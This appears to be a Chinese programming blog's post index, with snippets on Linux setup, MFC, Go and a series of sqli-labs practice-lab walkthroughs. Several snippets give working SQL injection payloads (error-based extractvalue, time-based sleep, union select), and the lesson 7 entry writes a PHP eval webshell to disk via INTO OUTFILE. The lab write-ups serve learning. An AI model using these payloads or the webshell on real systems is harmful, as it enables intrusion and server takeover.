- 博客(104)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 Could not retrieve mirrorlist http://mirrorlist.centos.org/?release=7&arch=x86_64&repo=os
Loaded plugins: fastestmirror, langpacksCould not retrieve mirrorlist http://mirrorlist.centos.org/?release=7&arch=x86_64&repo=os error was12: Timeout on http://mirrorlist.centos.org/?release=7&arch=x86_64&repo=os: (28, 'Connection timed
2021-04-15 17:39:52
3041
原创 kail Linux don‘t have stdio.h
sudo apt-get install libc6-devsudo apt-get install build-essentialsudo apt-get install gcc-9-basesudo apt-get install libc6-dev
2020-07-12 22:07:14
214
原创 sqli-labs通关-------15lesson-post(基于单引号的布尔时间盲注)
尝试反斜杠,发现没有任何报错。此刻可以考了一下时间盲注了。uname=1 or sleep(5) #&passwd=&submit=Submit发现无效对username 尝试闭合,发现是单引号闭合。So 开始时间盲注测试吧。我就先告辞了...
2019-07-05 18:35:24
309
原创 sqli-labs通关-------14lesson-post(双注入单引号变形 )
我觉得此处应该是双引号。继续输入俩反斜杠,发现是双引号的锅。所以直接盘它uname=uname=admin" and extractvalue(1,concat(0x7e,(select database()))) #&passwd=%40&submit=Submit下面这样也行:uname=admin" and extractvalue(1,co...
2019-07-05 18:34:22
291
原创 sqli-labs通关-------13lesson-post(单引号变形双注入)
我们根据尝试发现有报错。以及数据应该是以单引号和括号闭合的。尝试万能密码发现无效然后通过bp抓包改包下面的都可以uname=admin') and extractvalue(1,concat(0x7e,(select database()))) and ('uname=admin') and extractvalue(1,concat(0x7e,(select dat...
2019-07-05 18:33:27
266
原创 sqli-labs通关-------12lesson-post(基于错误的双引号变形)
首先我们查看万能密码变形(对第一个1进行各种引号括号变形)当发现使用双引号进行闭合时发现如下错对于上面的报错 首先怀疑 where username = “usernmae” and password = “ps”那本地数据库对语句进行演练。好了那我们尝试构造一下上面的语句吧。我们进行了如下构造uname=1") and extractvalue(1,c...
2019-07-05 18:32:21
284
原创 sqli-labs通关-------11lesson-post(基于错误的POST型单引号字符型注入)
Post 基于表单提交,类似于下图Sql的注释:--【空格】单行注释 在url中用--+ # 单行注释 /**/ 多行注释Post注入 个人觉得就是想法设法搞到密码登录或者想办法绕过密码方法一:我们先随便输入一个账号密码给账号加上反斜杠看看啥情况,发现有报错,so根据报错字段应该是被单引号隐起来的。...
2019-07-05 18:26:23
419
原创 sqli-labs通关-------10lesson-时间盲注(双引号)及get注入类型总结
第十课就是第九课的双引号所以过。总结什么get类型注入?就是url通过get类型进行传 类似于http://xxxx.com?id=1&name=s注入就是欺骗服务器执行你的sql(反正我是这样理解的)判断注入点?id=1 and 1=2 看看是否有页面变化判断字段数目(order by 1/2/3) 回显点(union select 1,2,3) 尝试判断是...
2019-07-05 18:25:23
300
原创 sqli-labs通关-------09lesson-时间盲注(单引号)
我们先判断有没有注入点,目测好像是没有根据这个图好像是没有闭合的意思。。然后我们就开始对?id=1 进行单引号、双引号、括号,及他们的组合是一个查看页面变化。然后发现它一直是这个鬼样子。看了我们需要尝试一下盲注了,既然啥也不显示,试试时间盲注吧。好像是至此用 ?id=1 and sleep(5)--+ 好像啥大反应。在尝试一下闭合,发现?id=1...
2019-07-05 18:24:28
296
原创 sqli-labs通关-------08lesson-布尔盲注(单引号)
页面没有回显和报错这时我们留需要考虑一下盲注了关于时间盲注和布尔盲注的区别布尔盲注 界面没有报错回显但是会有明显变化,比我我们写错了url会有内容丢失网页内容丢失的现象。时间盲注:就是没有报错页面也没有变化,此时就要考虑时间盲注了。对于lesson 8首先尝试 ?id=1 and 1=2--+,发现页面正常 我们多半要怀疑标点符号未闭合导致 sql语句转换的问题所以我...
2019-07-05 18:23:27
256
原创 sqli-labs通关-------07lesson-文件导出
首先我们介绍一个sql命令Select ‘<?php@eval($_GET[‘cmd’])?>’ into outfile “f://123.php”这句是myslq向外导出文件,这样就可以导出一句话木马了。插嘴一句 php加密与解密的问题自己看看去吧https://www.waitalone.cn/eval-gzinflate-base64_decode-decr...
2019-07-05 18:22:29
222
原创 sqli-labs通关-------05lesson-double_injection_single_quotes(盲注)
一进来让我们数据id然后???到这来我们解释一下名词http://www.91ri.org/7636.html介绍一下双查询注入,什么叫双查询注入,这个有点难以解释,通俗的来说就是嵌套子查询。我们理解一下子查询,查询的关键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select,里面的这个select语句就是子查询。这种方法...
2019-05-31 16:47:44
206
原创 sqli-labs通关-------04lesson-double_quotes
到这个我们发现输入单引号和双引号好像都没啥反应http://127.0.0.1:90/sqli-labs/Less-4/?id=1’)?????????所以我们输入一个转义符进去,报错了。为啥输入转移符1.因为我碰到了输错了。。。。。 2.我发现好像换别的字符不行。。 3.so转移符可以进去把sql语句的字符串特殊字符转义,于是赶得巧了...
2019-05-31 15:07:13
280
原创 sqli-labs通关-------03lesson-single_quotes_with_twist
基于括号用?id=1 没问题啥都有试试单引号,报错如下然后我们就试试)发现差不多但是我们会发现一个很尴尬的问题 就是and1=2 前面竟然没有爆错????看看源码,打印语句http://127.0.0.1:90/sqli-labs/Less-3/?id=2) and 1=2 union select 1,2,3--+只有这样我们才能成功!!!加上引...
2019-05-31 15:06:22
583
原创 sqli-labs通关-------02lesson-intiger
数字型注入至此会有人问啥叫数字型注入 啥叫字符型注入?我们看一下lesson1 和lesson 2里面的源代码,我也给他打印到界面上面了。Lesson1Lesson 2我们会发现区别在于$id有没有引号。有引号的就是字符型 我们要考虑用单引号使其闭合(那么问题来了 双引号呢),而数字型不需要。这节就给到这里,其余琢磨lesson1里面的吧...
2019-05-31 15:04:57
178
原创 sqli-labs通关-------01lesson 单引号(get方式注入)
判断是否有注入点1.1.实例遇到问题前提解决根据页面提示尝试 http://127.0.0.1:90/sqli-labs/Less-1/?id=1 id=2 …….发现每次页面都有不同数值,姑且判断其具有注入点。毕竟这块是找了个教程跟着走的。https://blog.csdn.net/qq_41420747/article/details/81836327https://blog.c...
2019-05-30 19:22:20
329
原创 sqli-labs通关-------00下载搭建靶场环境
下载靶场https://github.com/Audi-1/sqli-labs放到phpstudy www目录下 或者自己linux搭建一个。按照readme里面的操作通过其自带程序配置数据库。目前我刚学到的注入方式Get post 万能密码 头 时间盲注 布尔盲注 宽字节注入(通过gbk编码吃掉转义) dns注入( http://ceye.io unc路径 \\select ...
2019-05-30 19:20:19
1512
原创 nginx 代理设置(未完待续)
1.debain 安装NGINX ,访问/etc/nginx/sites-avallableserver { listen 81 default_server; root /var/www/html; server_name _; index index.html index.htm index.nginx-debian.htm;...
2019-04-17 11:12:07
126
原创 debain9 搭建samba
1.安装2.创建共享文件夹3.创建用户密码用户必须是已有用户4、修改配置文件(记得修改//的地方)/etc/samba/samba.conf[share] //共享名称comment = share folderbrowseable = yespath = /home/share/shareForsam //共享路径create mask = 0700...
2019-04-02 14:47:36
283
原创 secureCRT进行代理
一.对linux进行代理0.46想通过enter 代理出去1.首先连接服务器2.设置代理端口点击需要走代理ip的options ->session options->找到以下选项即可,进行填写勾选即可。端口为windows端口 ,记得关闭防火墙3.局域网ip 0.46 下载 proxychainsapt-get installproxycha...
2019-03-06 19:01:02
3952
转载 Shell表达式,如${file##*/} 取后缀
转自:https://blog.csdn.net/yifansj/article/details/78354365定义变量:file=/dir1/dir2/dir3/my.file.txt可以用${ }分别替换得到不同的值:${file#*/}:删掉第一个 / 及其左边的字符串:dir1/dir2/dir3/my.file.txt${file##*/}:删掉最后一个 / 及...
2019-02-13 16:36:16
2790
原创 UNIX网络编程:卷2进程间通信 总结
1、POSIX 和 system V标准区别2、管道FIFO 以阻塞打开必须先写在读否则会阻塞住导致失败。3、消息队列posix
2019-01-02 15:11:28
200
原创 innosetup 打包
1、shellexecShellExec('open','taskkill.exe','/f /im {#MyAppExeName}','',SW_HIDE,ewNoWait,ErrorCode); ShellExec('open','tskkill.exe',' {#MyAppName}','',SW_HIDE,ewNoWait,ErrorCode);2、cmd[Uninstall...
2018-11-17 19:35:18
550
转载 HOOK API入门之Hook自己程序的MessageBoxW
https://blog.csdn.net/friendan/article/details/12222651
2018-11-06 14:48:25
1759
原创 MFC------学习中的一些资料
设置按钮颜色https://blog.csdn.net/pkgk2013/article/details/78104665重新绘制按钮https://www.smwenku.com/a/5b8059002b71772165a71aea/
2018-10-15 18:59:43
142
原创 MFC-----------09GDI设备描述表类
CClientDC 用于窗口客户区画图,用于ONpain方法之外 当对像值位NULL 的时候 效果等同于CWindowDCCPaintDC 用于窗口客户区画图,只能用于onpaint方法之内CWindowDC 用于在屏幕任意位置画图CMetaFileDC 操作源文件画图新建项目下一步然后一直下一步,直至完成创建完毕后,会产生如下代码:...
2018-09-27 19:00:28
388
原创 MFC------------08创建MFC工程(不用向导)
为了不受视图框架的约束,我们先不用向导做些简单的工作熟悉一下如何使用类视图进行添加一些代码和消息。但是大的工程还是需要用到MFC的向导。2、34、按照步骤3在头文件夹右击添加头文件添加完毕后书写如下代码.h文件 #include <afxwin.h>class CMyApp : public CWinApp{};class C...
2018-09-27 16:22:02
310
原创 MFC------------02windows编程模型(未完)
我们可以用windows.h的库编写界面应用 其实就是对更重消息进行处理,在windows编程中,一切皆句柄下列图片截取于猎豹学院的视频代码如下#include <Windows.h>/** H是Handler的简写 事件驱动编程模型 句柄:在window 对任何东西操作都是靠句柄操作的。windows一切都是窗口。 C 一切皆指针,windows 一...
2018-09-27 14:40:23
195
原创 MFC------------01 使用windows sdk api 弹出消息框
使用编译器vs2010,通过windows API 弹出消息框1、打开编译器,新建项目--->空项目 在底部框中输入工程名字和选择工程存放路径 然后点击确定。2、右键源文件,操作如图3、如图输入名称将下列代码粘贴进去运行即可。代码如下#include <Windows.h>int WINAPI WinMain(HINSTANCE hI...
2018-09-27 14:16:17
902
原创 linux Apache服务------通过域名访问php文件
以下基于debain系统1.安装apacheapt-get install updateapt-getinstall apache2装完之后会有/var/ www/htmlapt-get install php7.0以下两条命令无用apt-cache search XXXapt-filesearch filename2.安装完毕后,可以在windows浏览...
2018-08-25 16:07:52
3165
1
原创 PHP-------------关于phpstudy 上日志文件
1.mysqllog-error=D:/phpstudy/MySQL/mysql_log_err.txt //err log for mysql selflog=D:/phpstudy/MySQL/mysql_log.txt //异常登录信息等 2、apacheD:\phpstudy\Apache\conf\httpd.conf # ...
2018-08-25 11:22:04
6878
转载 C++-------对handle的理解
转自:https://blog.csdn.net/Godsight/article/details/52738175我觉得自己对于指针理解比较透彻了,但关于句柄的理解,就容易犯理解成指针的错误. 一般说:句柄是资源(或项目)的唯一标识. 俺觉得这其实说得很不明白的,现在我想问的是句柄到底是怎么标识资源的: 1,句柄在32位机上是32位整型吗? 2,当HANDLE handle;声明句柄...
2018-08-21 15:56:44
28302
7
原创 C++----------------可变参数
//可变参数序列/* 头文件中的内容#define _INTSIZEOF(n) ((sizeof(n)+sizeof(int)-1)&~(sizeof(int) - 1) )#define va_start(ap,v) ( ap = (va_list)&v + _INTSIZEOF(v) ) //第一个可选参数地址#define va_arg(ap,t) ( *(t ...
2018-08-17 14:37:28
109
原创 linux---------发现缺少某个自己没有见过的包如何处理
1.缺少的包,效果图2.处理办法:安装:apt-get install apt-fileapt-file search 文件名apt-get install 这样就差不多能基本实现所需的功能了。如果安装不上,update 一下试试。...
2018-08-16 17:15:27
393
原创 C++---------------命名空间
命名空间可以放到头文件里面,但是尽量不要这么做。我下面的例子基本把情况概括。没有注释。。。如有不妥请大神指教1.第一种方式,不带类的命名空间// test.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include <iostream>#include <typeinfo.h>namespace mybuff{...
2018-08-16 16:42:25
144
原创 一些不错的社区
1.基于qt http://qtdream.com 擅长三维角色仿真动画。2.go forum https://forum.golangbridge.org/3.qt rorum https://forum.qt.io/
2018-08-16 09:55:09
145
原创 syslog------的发送时候的标志位含义
由于详解syslog的很多,我就不赘述了,下面贴上一张图:本图是从底下向上看的。上图中,最底下的是1,倒数第二行是0(一个小意外)下面是测试时候发送的udp数据:<1> 10001 abvc web 000000 192.168.0.160 192.168.0.38 8080 514 tcp 10 5 hello,world<0> 10001 abvc ...
2018-08-13 10:24:54
488
原创 go 调用windows dll 的三种方法
大部分代码参考:https://studygolang.com/articles/2712第三种方法是从Go\src\internal\syscall\windows\sysdll源码中找到的,三种方法的具体区别还不是很明晰,初步判断:lazy应该是相当于动态库,其余两种直接把库加载到内存。package mainimport( "fmt" "syscall" "time"...
2018-07-30 16:56:51
6501
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人